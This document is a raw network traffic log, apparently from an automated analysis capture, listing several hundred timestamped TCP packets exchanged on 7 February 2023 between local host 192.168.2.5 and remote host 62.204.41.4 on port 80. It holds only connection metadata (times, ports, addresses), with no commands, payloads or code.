Feb 7, 2023 19:58:16.154189110 CET	80	49962	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:16.154340029 CET	49962	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:16.261959076 CET	49962	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:16.262763023 CET	49963	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:16.324486971 CET	80	49963	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:16.324528933 CET	80	49962	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:16.324595928 CET	49963	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:16.324626923 CET	49962	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:16.325114965 CET	49963	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:16.386806965 CET	80	49963	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:16.389321089 CET	80	49963	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:16.389480114 CET	49963	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:16.499353886 CET	49963	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:16.500384092 CET	49964	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:16.561317921 CET	80	49963	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:16.561419964 CET	49963	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:16.561696053 CET	80	49964	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:16.561817884 CET	49964	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:16.564708948 CET	49964	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:16.626146078 CET	80	49964	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:16.628155947 CET	80	49964	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:16.628285885 CET	49964	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:16.734786987 CET	49964	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:16.735676050 CET	49965	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:16.796025991 CET	80	49965	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:16.796142101 CET	49965	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:16.796474934 CET	49965	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:16.796799898 CET	80	49964	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:16.796869993 CET	49964	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:16.856769085 CET	80	49965	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:16.859021902 CET	80	49965	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:16.859124899 CET	49965	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:16.964891911 CET	49965	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:16.965617895 CET	49966	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:17.025146961 CET	80	49965	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:17.025221109 CET	49965	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:17.025939941 CET	80	49966	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:17.026026011 CET	49966	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:17.026384115 CET	49966	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:17.087225914 CET	80	49966	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:17.091063976 CET	80	49966	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:17.091211081 CET	49966	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:17.201298952 CET	49966	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:17.202629089 CET	49967	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:17.261970043 CET	80	49966	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:17.262129068 CET	49966	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:17.264156103 CET	80	49967	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:17.264257908 CET	49967	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:17.264760971 CET	49967	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:17.326256037 CET	80	49967	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:17.328480959 CET	80	49967	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:17.328675985 CET	49967	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:17.449287891 CET	49967	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:17.450155973 CET	49968	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:17.510920048 CET	80	49968	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:17.510972977 CET	80	49967	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:17.511140108 CET	49967	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:17.511156082 CET	49968	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:17.511976957 CET	49968	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:17.572633982 CET	80	49968	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:17.574965000 CET	80	49968	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:17.575942039 CET	49968	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:17.683996916 CET	49968	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:17.684653997 CET	49969	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:17.744735003 CET	80	49968	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:17.744766951 CET	80	49969	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:17.744920015 CET	49968	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:17.744947910 CET	49969	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:17.745574951 CET	49969	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:17.805818081 CET	80	49969	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:17.808662891 CET	80	49969	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:17.811702967 CET	49969	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:17.923784018 CET	49969	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:17.924913883 CET	49970	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:17.984190941 CET	80	49969	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:17.985450029 CET	80	49970	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:17.985692978 CET	49969	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:17.986268044 CET	49970	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:17.986268044 CET	49970	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:18.046847105 CET	80	49970	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:18.050436974 CET	80	49970	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:18.050627947 CET	49970	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:18.152941942 CET	49970	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:18.153784037 CET	49971	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:18.213567972 CET	80	49971	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:18.214760065 CET	80	49970	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:18.214951038 CET	49970	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:18.215265989 CET	49971	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:18.215583086 CET	49971	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:18.274976015 CET	80	49971	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:18.277318001 CET	80	49971	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:18.280359030 CET	49971	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:18.428934097 CET	49971	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:18.429656982 CET	49972	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:18.489417076 CET	80	49971	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:18.489593983 CET	49971	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:18.490345955 CET	80	49972	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:18.490473986 CET	49972	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:18.490991116 CET	49972	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:18.551911116 CET	80	49972	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:18.554172039 CET	80	49972	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:18.554317951 CET	49972	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:18.668994904 CET	49972	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:18.669879913 CET	49973	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:18.729567051 CET	80	49972	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:18.729654074 CET	49972	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:18.730413914 CET	80	49973	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:18.730566978 CET	49973	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:18.734051943 CET	49973	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:18.794311047 CET	80	49973	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:18.796974897 CET	80	49973	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:18.797132969 CET	49973	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:18.904608965 CET	49973	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:18.906316042 CET	49974	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:18.965524912 CET	80	49973	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:18.965656042 CET	49973	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:18.968821049 CET	80	49974	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:18.968950987 CET	49974	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:18.969300985 CET	49974	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:19.031824112 CET	80	49974	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:19.034096956 CET	80	49974	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:19.034348965 CET	49974	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:19.136929989 CET	49974	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:19.137840033 CET	49975	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:19.198860884 CET	80	49975	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:19.199099064 CET	49975	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:19.199652910 CET	49975	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:19.199717045 CET	80	49974	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:19.199827909 CET	49974	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:19.260205030 CET	80	49975	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:19.264226913 CET	80	49975	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:19.264307022 CET	49975	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:19.374439955 CET	49975	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:19.392522097 CET	49976	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:19.435584068 CET	80	49975	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:19.435705900 CET	49975	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:19.455327988 CET	80	49976	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:19.455452919 CET	49976	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:19.455951929 CET	49976	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:19.518574953 CET	80	49976	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:19.521222115 CET	80	49976	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:19.521302938 CET	49976	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:19.642329931 CET	49976	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:19.643809080 CET	49977	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:19.704893112 CET	80	49976	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:19.705025911 CET	49976	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:19.705174923 CET	80	49977	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:19.705255032 CET	49977	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:19.705615997 CET	49977	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:19.766927958 CET	80	49977	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:19.770293951 CET	80	49977	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:19.770390034 CET	49977	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:19.888391972 CET	49977	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:19.889213085 CET	49978	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:19.949975014 CET	80	49977	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:19.950064898 CET	49977	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:19.950530052 CET	80	49978	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:19.950720072 CET	49978	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:19.951025963 CET	49978	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:20.012195110 CET	80	49978	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:20.015084982 CET	80	49978	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:20.015216112 CET	49978	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:20.121395111 CET	49978	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:20.122013092 CET	49979	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:20.181448936 CET	80	49979	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:20.181633949 CET	49979	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:20.181958914 CET	49979	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:20.182893991 CET	80	49978	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:20.183048010 CET	49978	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:20.241194963 CET	80	49979	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:20.245548010 CET	80	49979	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:20.245783091 CET	49979	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:20.359168053 CET	49979	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:20.360057116 CET	49980	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:20.418720961 CET	80	49979	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:20.418925047 CET	49979	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:20.420608044 CET	80	49980	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:20.420717955 CET	49980	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:20.421307087 CET	49980	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:20.481913090 CET	80	49980	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:20.485151052 CET	80	49980	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:20.488807917 CET	49980	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:20.615243912 CET	49980	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:20.615928888 CET	49981	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:20.676033020 CET	80	49980	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:20.676150084 CET	49980	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:20.676177979 CET	80	49981	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:20.676335096 CET	49981	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:20.676822901 CET	49981	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:20.737339973 CET	80	49981	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:20.740328074 CET	80	49981	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:20.742825985 CET	49981	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:20.855834961 CET	49981	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:20.856473923 CET	49982	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:20.916322947 CET	80	49981	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:20.916874886 CET	80	49982	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:20.917028904 CET	49981	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:20.917071104 CET	49982	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:20.917525053 CET	49982	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:20.977971077 CET	80	49982	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:20.980205059 CET	80	49982	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:20.981617928 CET	49982	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:21.090859890 CET	49982	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:21.091567993 CET	49983	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:21.151566029 CET	80	49982	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:21.151714087 CET	49982	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:21.152735949 CET	80	49983	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:21.152849913 CET	49983	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:21.153208017 CET	49983	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:21.214320898 CET	80	49983	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:21.219578981 CET	80	49983	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:21.220309973 CET	49983	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:21.324739933 CET	49983	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:21.325453997 CET	49984	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:21.386081934 CET	80	49983	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:21.386120081 CET	80	49984	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:21.386400938 CET	49983	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:21.387139082 CET	49984	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:21.387139082 CET	49984	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:21.448224068 CET	80	49984	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:21.453010082 CET	80	49984	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:21.453213930 CET	49984	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:21.561064959 CET	49984	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:21.562884092 CET	49985	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:21.621622086 CET	80	49984	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:21.621859074 CET	49984	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:21.623509884 CET	80	49985	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:21.623707056 CET	49985	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:21.623964071 CET	49985	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:21.684489965 CET	80	49985	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:21.688324928 CET	80	49985	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:21.688605070 CET	49985	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:21.793504000 CET	49985	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:21.794662952 CET	49986	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:21.854213953 CET	80	49985	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:21.854470968 CET	49985	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:21.856152058 CET	80	49986	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:21.856373072 CET	49986	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:21.857183933 CET	49986	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:21.918792963 CET	80	49986	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:21.923472881 CET	80	49986	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:21.923583984 CET	49986	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:22.029441118 CET	49986	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:22.030961037 CET	49987	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:22.090542078 CET	80	49987	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:22.090806961 CET	49987	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:22.091028929 CET	80	49986	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:22.091155052 CET	49986	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:22.091331959 CET	49987	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:22.150778055 CET	80	49987	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:22.156634092 CET	80	49987	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:22.156727076 CET	49987	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:22.262167931 CET	49987	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:22.263025045 CET	49988	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:22.321886063 CET	80	49987	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:22.322102070 CET	49987	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:22.323420048 CET	80	49988	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:22.323559046 CET	49988	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:22.324290037 CET	49988	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:22.384526014 CET	80	49988	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:22.388648987 CET	80	49988	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:22.388763905 CET	49988	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:22.496702909 CET	49988	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:22.497529030 CET	49989	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:22.557512045 CET	80	49988	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:22.557553053 CET	80	49989	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:22.557718039 CET	49988	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:22.557774067 CET	49989	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:22.562861919 CET	49989	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:22.622482061 CET	80	49989	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:22.627059937 CET	80	49989	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:22.627259016 CET	49989	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:22.749125004 CET	49989	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:22.750102997 CET	49990	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:22.808943987 CET	80	49989	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:22.809134007 CET	49989	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:22.810375929 CET	80	49990	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:22.810523987 CET	49990	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:22.962299109 CET	49990	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:23.022865057 CET	80	49990	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:23.026417017 CET	80	49990	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:23.026602983 CET	49990	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:23.251007080 CET	49990	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:23.251696110 CET	49991	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:23.311494112 CET	80	49990	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:23.311686039 CET	49990	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:23.311873913 CET	80	49991	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:23.311974049 CET	49991	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:23.361807108 CET	49991	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:23.422081947 CET	80	49991	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:23.428241968 CET	80	49991	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:23.428391933 CET	49991	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:23.575442076 CET	49991	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:23.576124907 CET	49992	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:23.636609077 CET	80	49991	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:23.636689901 CET	49991	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:23.639416933 CET	80	49992	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:23.639533043 CET	49992	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:23.691994905 CET	49992	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:23.754780054 CET	80	49992	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:23.758259058 CET	80	49992	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:23.758374929 CET	49992	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:24.459846020 CET	49992	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:24.460621119 CET	49993	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:24.521023035 CET	80	49993	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:24.521291971 CET	49993	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:24.522624016 CET	80	49992	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:24.522722960 CET	49992	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:24.614336967 CET	49993	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:24.674806118 CET	80	49993	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:24.679451942 CET	80	49993	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:24.679594994 CET	49993	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:24.794629097 CET	49993	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:24.795497894 CET	49994	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:24.855046988 CET	80	49993	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:24.855207920 CET	49993	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:24.857145071 CET	80	49994	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:24.857304096 CET	49994	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:24.905755997 CET	49994	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:24.966581106 CET	80	49994	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:24.969290972 CET	80	49994	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:24.969455957 CET	49994	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:25.307616949 CET	49994	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:25.308262110 CET	49995	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:25.368133068 CET	80	49994	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:25.368297100 CET	49994	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:25.370817900 CET	80	49995	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:25.370944023 CET	49995	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:25.960796118 CET	49995	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:26.023746967 CET	80	49995	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:26.028198957 CET	80	49995	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:26.028301001 CET	49995	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:26.483145952 CET	49995	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:26.483879089 CET	49996	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:26.544547081 CET	80	49996	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:26.544774055 CET	49996	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:26.545886040 CET	80	49995	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:26.546161890 CET	49995	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:26.579679012 CET	49996	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:26.640372038 CET	80	49996	62.204.41.4	192.168.2.5
